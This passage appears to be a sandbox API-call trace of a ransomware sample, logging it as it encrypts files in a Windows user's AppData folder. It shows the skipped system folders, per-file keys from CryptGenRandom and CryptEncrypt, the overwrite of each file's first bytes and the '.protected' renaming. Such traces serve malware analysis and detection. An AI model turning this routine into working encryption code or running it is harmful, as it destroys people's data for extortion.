[0091.067] StrStrW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".txt") returned 0x0 [0091.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".rar") returned 0x0 [0091.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".zip") returned 0x0 [0091.067] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.068] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.068] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.068] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.069] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.069] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.069] CloseHandle (hObject=0xd4) returned 1 [0091.069] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png.protected") returned 79 [0091.069] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\taop-xrrvnbmdlj.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\taop-xrrvnbmdlj.png.protected")) returned 1 [0091.070] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="Windows") returned -1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="Program Files") returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="Program Files (x86)") returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="$Recycle.bin") returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="System Volume Information") returned 1 [0091.070] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.070] StrStrIW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".protected") returned 0x0 [0091.070] lstrcmpW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0091.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thchiexi vbzqmf6d9ty.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.070] StrStrW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".txt") returned 0x0 [0091.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.070] StrStrW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".rar") returned 0x0 [0091.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.071] StrStrW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".zip") returned 0x0 [0091.071] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.071] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.071] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.072] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.072] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.072] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 
[0091.072] CloseHandle (hObject=0xd4) returned 1 [0091.073] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg.protected") returned 84 [0091.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thchiexi vbzqmf6d9ty.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thchiexi vbzqmf6d9ty.jpg.protected")) returned 1 [0091.073] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="Windows") returned -1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="Program Files") returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="Program Files (x86)") returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="$Recycle.bin") returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="System Volume Information") returned 1 [0091.073] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.073] StrStrIW (lpFirst="unHbl.rtf", lpSrch=".protected") returned 0x0 [0091.073] lstrcmpW (lpString1="unHbl.rtf", lpString2="RESTORE_FILES.txt") returned 1 [0091.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\unhbl.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.074] StrStrW (lpFirst="unHbl.rtf", lpSrch=".txt") returned 0x0 [0091.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.074] StrStrW (lpFirst="unHbl.rtf", lpSrch=".rar") returned 0x0 [0091.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.074] StrStrW (lpFirst="unHbl.rtf", lpSrch=".zip") returned 0x0 [0091.074] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.075] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.075] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.076] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.076] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.076] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, 
lpOverlapped=0x0) returned 1 [0091.076] CloseHandle (hObject=0xd4) returned 1 [0091.076] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf.protected") returned 69 [0091.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\unhbl.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\unhbl.rtf.protected")) returned 1 [0091.077] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="Windows") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="Program Files") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="Program Files (x86)") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="$Recycle.bin") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="System Volume Information") returned 1 [0091.077] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.077] StrStrIW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".protected") returned 0x0 [0091.077] lstrcmpW (lpString1="wSbPKUNuyIlxN.odp", lpString2="RESTORE_FILES.txt") returned 1 [0091.077] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.077] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsbpkunuyilxn.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.077] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.078] StrStrW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".txt") returned 0x0 [0091.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.078] StrStrW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".rar") returned 0x0 [0091.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.078] StrStrW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".zip") returned 0x0 [0091.078] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.078] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.078] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.079] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.079] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.079] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.079] CloseHandle (hObject=0xd4) returned 1 [0091.080] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp.protected") returned 77 [0091.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsbpkunuyilxn.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsbpkunuyilxn.odp.protected")) returned 1 [0091.081] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="Windows") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="Program Files") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="Program Files (x86)") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="$Recycle.bin") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="System Volume Information") returned 1 [0091.081] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.081] StrStrIW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".protected") returned 0x0 [0091.081] lstrcmpW (lpString1="xSv5cpFR2Yv3.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.081] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.081] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsv5cpfr2yv3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.082] StrStrW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".txt") returned 0x0 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.082] StrStrW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".rar") returned 0x0 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.082] StrStrW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".zip") returned 0x0 [0091.082] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x188e, lpOverlapped=0x0) returned 1 [0091.082] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffe772, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.082] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x188e, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x188e, lpOverlapped=0x0) returned 1 [0091.083] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.083] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) 
returned 1 [0091.083] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.083] CloseHandle (hObject=0xd4) returned 1 [0091.084] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png.protected") returned 76 [0091.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsv5cpfr2yv3.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsv5cpfr2yv3.png.protected")) returned 1 [0091.085] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="Windows") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="Program Files") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="Program Files (x86)") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="$Recycle.bin") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="System Volume Information") returned 1 [0091.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.085] StrStrIW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".protected") returned 0x0 [0091.085] lstrcmpW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="RESTORE_FILES.txt") returned 1 [0091.085] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.085] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xt-_gnnqz-4llzld.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.086] StrStrW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".txt") returned 0x0 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.086] StrStrW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".rar") returned 0x0 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.086] StrStrW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".zip") returned 0x0 [0091.086] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.086] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.086] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.087] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.087] WriteFile (in: hFile=0xd4, 
lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.087] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.087] CloseHandle (hObject=0xd4) returned 1 [0091.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv.protected") returned 80 [0091.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xt-_gnnqz-4llzld.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xt-_gnnqz-4llzld.mkv.protected")) returned 1 [0091.088] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="Windows") returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="Program Files") returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="Program Files (x86)") returned 